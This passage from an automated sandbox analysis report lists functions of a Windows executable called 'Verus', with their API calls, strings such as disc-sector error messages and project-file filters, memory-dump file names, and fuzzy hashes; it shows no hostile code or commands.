Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$CreateWindow_memset
String ID: ,$PROGRESS
API String ID: 1045023139-3907447268
Opcode ID: a654078f5e65279ca5dd33f572c70d8a314b6e96944c781267629cdcd70217ff
Instruction ID: 4a5b9d13840866c2faa389dbfd3fef40eedac7bf49f5ed3b586ade3fe96cc954
Opcode Fuzzy Hash: a654078f5e65279ca5dd33f572c70d8a314b6e96944c781267629cdcd70217ff
Instruction Fuzzy Hash: 19212CB0244301BFE324DF15DC82F56B7A5BB88714F10461DF2989B2D0C7B9A844CBAA

Function 0044CF70 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 69stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416AF0: _memset.LIBCMT ref: 00416B0B
Part of subcall function 00416AF0: lstrlenW.KERNEL32(?), ref: 00416B9B
Part of subcall function 00416AF0: lstrcpynW.KERNEL32(?,?,00000104), ref: 00416BAD

GetActiveWindow.USER32 ref: 0044CFE1

Part of subcall function 00416740: GetOpenFileNameW.COMDLG32(?), ref: 00416769

lstrcpyW.KERNEL32(?,?), ref: 0044D005

Part of subcall function 00445E50: lstrcpyW.KERNEL32(?,FeyWriter), ref: 00445E81
Part of subcall function 00445E50: lstrcatW.KERNEL32(?, - ), ref: 00445E93
Part of subcall function 00445E50: lstrcpyW.KERNEL32(?,?), ref: 00445E9E
Part of subcall function 00445E50: lstrcatW.KERNEL32(?,?), ref: 00445EBD
Part of subcall function 00445E50: SetWindowTextW.USER32(?,?), ref: 00445EC8

Strings

Project Files (*.irp), xrefs: 0044CFAF
LHL, xrefs: 0044CFCE
irp, xrefs: 0044CFBE
Untitled, xrefs: 0044CFB9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcpy$Windowlstrcat$ActiveFileNameOpenText_memsetlstrcpynlstrlen
String ID: LHL$Project Files (*.irp)$Untitled$irp
API String ID: 1236646150-4098027102
Opcode ID: c596f52d5a89774219919f4ab715b481ea9f15cf5fc2a509bbc73812a3f2cc97
Instruction ID: 20f4a45d796c00625fb496f15b08abacaf456ac06f09df7b3f64bd948de9864d
Opcode Fuzzy Hash: c596f52d5a89774219919f4ab715b481ea9f15cf5fc2a509bbc73812a3f2cc97
Instruction Fuzzy Hash: 0121D3B1604740AFD760DB25C946F9BB7E8EBC9728F004A2EF559832C1CB389805CB5E

Function 00426A70 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 00426A8D
_strncmp.LIBCMT ref: 00426AA4

Part of subcall function 0049266C: __wcstoi64.LIBCMT ref: 00492662

_strncmp.LIBCMT ref: 00426AEE

Strings

Error on sector, xrefs: 00426A9E
Retrying from sector, xrefs: 00426AE8
Input/Output error. , xrefs: 00426A87

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _strncmp$__wcstoi64
String ID: Error on sector$Input/Output error. $Retrying from sector
API String ID: 1532516419-1912912501
Opcode ID: 1436de50cc81a9726af74464ccd2a44f61a1b351ddf2b39899877294157e25d8
Instruction ID: 83064249f7677014b5c605ff613318802ed5f8b8fe915f63df7887536a8eebd4
Opcode Fuzzy Hash: 1436de50cc81a9726af74464ccd2a44f61a1b351ddf2b39899877294157e25d8
Instruction Fuzzy Hash: D411CBB170030037E610A6245C42F6B37645B91B1CF15053EFE1997383F9BAB955C1AA

Function 00466960 Relevance: 10.6, APIs: 7, Instructions: 61stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,00000000,00000000), ref: 00466991
lstrlenW.KERNEL32(?), ref: 004669A2
lstrlenW.KERNEL32(?), ref: 004669B3
_wcsncat.LIBCMT ref: 004669C7
lstrcatW.KERNEL32(?,?), ref: 004669DE
_vswprintf_s.LIBCMT ref: 004669FA
SetDlgItemTextW.USER32(?,000003ED,?), ref: 00466A0C

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$ItemText_vswprintf_s_wcsncatlstrcatlstrcpy
String ID:
API String ID: 765640527-0
Opcode ID: 3c70678cb7d94a88e1824e831e076ed284a60c7e67d25d706061274b1cf8ec9c
Instruction ID: 418a899fe4e603db713f489b96f6df4a2eb8132b94c9833943b544d5220fa37d
Opcode Fuzzy Hash: 3c70678cb7d94a88e1824e831e076ed284a60c7e67d25d706061274b1cf8ec9c
Instruction Fuzzy Hash: 9711C8B6504301ABD720DB64DC89DEFB7A8FF88710F004A2EF65983141DB34E509C7A6

Function 00466AB0 Relevance: 10.6, APIs: 7, Instructions: 61windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00466AC1
EnableWindow.USER32(00000000,00000001), ref: 00466ACC
GetDlgItem.USER32(?,00000001), ref: 00466AD4
SendMessageW.USER32(?,00000028,00000000,00000000), ref: 00466ADF
GetDlgItem.USER32(?,00000002), ref: 00466AEB
EnableWindow.USER32(00000000,00000000), ref: 00466AF0
PostMessageW.USER32(?,00008001,00000000,00000000), ref: 00466B3A

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Item$EnableMessageWindow$PostSend
String ID:
API String ID: 3136370649-0
Opcode ID: 7385ebe0b5bfb9be831924ec29f0091a5dba0e15822371dd784e81910f80aeb5
Instruction ID: b82207dd712082589434802bb0f2506297f2613346a1ae3b73985b1a672e81cd
Opcode Fuzzy Hash: 7385ebe0b5bfb9be831924ec29f0091a5dba0e15822371dd784e81910f80aeb5
Instruction Fuzzy Hash: 241125757403007BF630ABA59C89F6BB3ADAF88B10F154519F744D72C0CAB4A845CB68

Function 0046CBA0 Relevance: 10.6, APIs: 7, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0046CBB7
SendMessageW.USER32(?,00000401,00000082,00000001), ref: 0046CBCD
SendMessageW.USER32(?,00000401,00000083,00000001), ref: 0046CBDF
SendMessageW.USER32(?,00000401,00000084,00000001), ref: 0046CBF1
SendMessageW.USER32(?,00000401,00000082,00000000), ref: 0046CC14
SendMessageW.USER32(?,00000401,00000083,00000000), ref: 0046CC26
SendMessageW.USER32(?,00000401,00000084,00000000), ref: 0046CC38

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d105e5c49e49a4150dd96a88d91b9f060ca4d508aba4d3661ed8ecc083cb04a2
Instruction ID: 9c3ae63e39b1ac4912212b5161d62ed1e7ab195c046ed426d598b5f3c1ae90fa
Opcode Fuzzy Hash: d105e5c49e49a4150dd96a88d91b9f060ca4d508aba4d3661ed8ecc083cb04a2
Instruction Fuzzy Hash: EA119E7139131076E660E6699E82F57E3996FD4F00F51890AB341BB5D0C9F5F8418B54

Function 00444280 Relevance: 10.6, APIs: 7, Instructions: 58windowstringCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00444296
_vswprintf_s.LIBCMT ref: 004442B5

Part of subcall function 00492DCB: __vsnwprintf_l.LIBCMT ref: 00492DDE

GetWindowTextLengthW.USER32(?), ref: 004442C1
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004442D8
SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 004442E7
SendMessageW.USER32(?,000000C2,00000000,AD5E0258), ref: 004442F5
lstrlenW.KERNEL32(AD5E0258,?,?,?,?,?,00000000,0000005C,?,?,?), ref: 00444309

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$LengthText__vsnwprintf_l_vswprintf_slstrlen
String ID:
API String ID: 286455680-0
Opcode ID: ee9eba3ccdc06086be2770a29cb43575eb61fef89b1fdd91506786df39dbeb5c
Instruction ID: 4ed6f92c46b3535516ee9a19c301adf2d0dd472575649730bd9133b4894344ff
Opcode Fuzzy Hash: ee9eba3ccdc06086be2770a29cb43575eb61fef89b1fdd91506786df39dbeb5c
Instruction Fuzzy Hash: 9E0144757003007BE620AB69DD85FBB73ECABC8B05F04491DBA4597281C678F806876D

Function 00468A30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58stringwindowCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,0 B), ref: 00468AB6
CreateSolidBrush.GDI32(00874A20), ref: 00468ACB
CreateSolidBrush.GDI32(00005CCE), ref: 00468AD8
CreateSolidBrush.GDI32(000000A4), ref: 00468AE5
CreatePopupMenu.USER32 ref: 00468AF6

Strings

0 B, xrefs: 00468AB0

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Create$BrushSolid$MenuPopuplstrcpy
String ID: 0 B
API String ID: 3096234680-3598465180
Opcode ID: 8e24401d5b01ceeced3f017097c5489bb69524848f57c370356e189c8fadcd85
Instruction ID: 299fc7ff245f0d55c2de0771805982833d1fddf2c9332e70c5d73bef3429774b
Opcode Fuzzy Hash: 8e24401d5b01ceeced3f017097c5489bb69524848f57c370356e189c8fadcd85
Instruction Fuzzy Hash: FE21E2B1A05B049FD7A0DF799944A92BBF4FF89701F004A2EE5AEC7710EB7065008F49

Function 004603A0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

GetDlgItemTextW.USER32(?,00000434,004EEC94,0000007F), ref: 004603BA
GetDlgItemTextW.USER32(?,00000436,004EED94,0000007F), ref: 004603CC
GetDlgItemTextW.USER32(?,00000437,004EEE94,0000007F), ref: 004603DE
GetDlgItemTextW.USER32(?,00000438,004EEF94,0000007F), ref: 004603F0
GetDlgItemTextW.USER32(?,0000043D,004EF094,00000024), ref: 00460402
GetDlgItemTextW.USER32(?,0000043E,004EF0DE,00000024), ref: 00460414
GetDlgItemTextW.USER32(?,0000043F,004EF128,00000024), ref: 00460426

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemText
String ID:
API String ID: 3367045223-0
Opcode ID: 226aec789c762688b4e24facf17c0c785f7ca0259a412a0922953a0ddfa23c5f
Instruction ID: 8cfd816e24c920aab8fcd65853cbcbe141f8bedfcd768f71f39bb84992c5e444
Opcode Fuzzy Hash: 226aec789c762688b4e24facf17c0c785f7ca0259a412a0922953a0ddfa23c5f
Instruction Fuzzy Hash: CD016DA57C034476E130A7AB9D82F12F2D89FB4F05F12881AB359BB5D0C5FCF8008A28

Function 0043A6A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49stringwindowCOMMON

Download Yara Rule

APIs

LoadMenuW.USER32(?,?), ref: 0043A6E1
GetStockObject.GDI32(00000011), ref: 0043A6EC
GetObjectW.GDI32(00000000,0000005C,?), ref: 0043A6FA
lstrcpyW.KERNEL32(?,Webdings), ref: 0043A70A
CreateFontIndirectW.GDI32 ref: 0043A722

Strings

Webdings, xrefs: 0043A700

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Object$CreateFontIndirectLoadMenuStocklstrcpy
String ID: Webdings
API String ID: 3766185963-756464237
Opcode ID: e3fc11b988e2be024a6cc5a42bea50e173b068fed43715f15e35767619b985d7
Instruction ID: 9ed05b7e920066f8cad0c7f66d840deafa7664a7d1c6b6bd37d4d70971d7f30a
Opcode Fuzzy Hash: e3fc11b988e2be024a6cc5a42bea50e173b068fed43715f15e35767619b985d7
Instruction Fuzzy Hash: C51128B15043009FD3609F6AD955A57FBF8BFA8700F008A1EF18983660D7B4A548CF5A

Function 00446830 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000410,00000002,00000000), ref: 00446855
SendMessageW.USER32 ref: 0044687D
GetClientRect.USER32(?,?), ref: 0044688F
SendMessageW.USER32(?,0000040B,00000000,?), ref: 004468B0

Strings

, xrefs: 00446875
P, xrefs: 0044686D

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$ClientRect
String ID: $P
API String ID: 1925248871-1569664928
Opcode ID: ef631ac4075361a358cb1f376c869e20ac5e607da562a1034305faf74216c276
Instruction ID: 5a5d6c97f6abcb22e0f5b2c1aee97befa2ba1467a201e6852fa146bb10633b03
Opcode Fuzzy Hash: ef631ac4075361a358cb1f376c869e20ac5e607da562a1034305faf74216c276
Instruction Fuzzy Hash: C70152B12043096FE314DF65CC95E6BB7E8EBC8714F008A1DF655972C0D774E8498B69

Function 0041AE60 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(?,?,00000100,00000000), ref: 0041AEAF
mciSendStringW.WINMM(status seq length,?,00000100,00000000), ref: 0041AEC2
mciSendStringW.WINMM(close seq,?,000000FF,00000000), ref: 0041AED8

Part of subcall function 00491B96: __wcstoi64.LIBCMT ref: 00491B8C

Strings

status seq length, xrefs: 0041AEBD
open "%s" type waveaudio alias seq, xrefs: 0041AE84
close seq, xrefs: 0041AED3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: SendString$__wcstoi64
String ID: close seq$open "%s" type waveaudio alias seq$status seq length
API String ID: 1713541561-2940014498
Opcode ID: 7b85aab25ac227487e2699fda8005f9093a32fd5b6fe7866ef874967494606e4
Instruction ID: 32a9f9c2a12407d722f65c6eb264a0b8433987bbde9d38e287af5bfd9007fdf8
Opcode Fuzzy Hash: 7b85aab25ac227487e2699fda8005f9093a32fd5b6fe7866ef874967494606e4
Instruction Fuzzy Hash: C801D6B55443007BE270DB50DD43FEB3BA9AFC8714F50492EB24D860C1E9B96558CB9B

Function 00416390 Relevance: 9.1, APIs: 6, Instructions: 139synchronizationsleepthreadCOMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 0041648A

Part of subcall function 00456C60: lstrcpyW.KERNEL32(?,00000000,00000000), ref: 00456C91
Part of subcall function 00456C60: lstrlenW.KERNEL32(?), ref: 00456CA2
Part of subcall function 00456C60: lstrlenW.KERNEL32(?), ref: 00456CB3
Part of subcall function 00456C60: _wcsncat.LIBCMT ref: 00456CC7
Part of subcall function 00456C60: _vswprintf_s.LIBCMT ref: 00456CFA

Part of subcall function 00456FB0: lstrcpyW.KERNEL32(?,00000000,00000000), ref: 00456FE4
Part of subcall function 00456FB0: lstrlenW.KERNEL32(?), ref: 00456FF5
Part of subcall function 00456FB0: lstrlenW.KERNEL32(?), ref: 00456FFF
Part of subcall function 00456FB0: _wcsncat.LIBCMT ref: 0045700C
Part of subcall function 00456FB0: SetDlgItemTextW.USER32(?,000003EF,?), ref: 00457030

Part of subcall function 004919DD: _malloc.LIBCMT ref: 004919F7

CreateThread.KERNEL32(00000000,00000000,00416060,00000000,00000000,?), ref: 004164ED
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 004164FE
Sleep.KERNEL32(00000064), ref: 00416517
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0041651C
CloseHandle.KERNEL32(00000000), ref: 00416526

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$ObjectSingleTextWait_wcsncatlstrcpy$CloseCreateHandleItemSleepThreadWindow_malloc_vswprintf_s
String ID:
API String ID: 3985238766-0
Opcode ID: d6a23725d14d20de680f3de58bc6851c6e29ccb3e2aa8dcfbec1531061539e7d
Instruction ID: 5ae38e48467d6e495fe885a3a350e6f7580a03a4dc4f15f6e08a31ff19a382cd
Opcode Fuzzy Hash: d6a23725d14d20de680f3de58bc6851c6e29ccb3e2aa8dcfbec1531061539e7d
Instruction Fuzzy Hash: 17512C711043C09FD311DF669C91AABBBE5AB95304F04092EFA824B3D3D678A508C76E

Function 0046E340 Relevance: 9.1, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

lstrcmpW.KERNEL32(?,?,0000001C,?,0000001C,?,-00000001,00000000,0045B390,0000002C,AD5E0258,?,00000000,?,00000004), ref: 0046E37B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
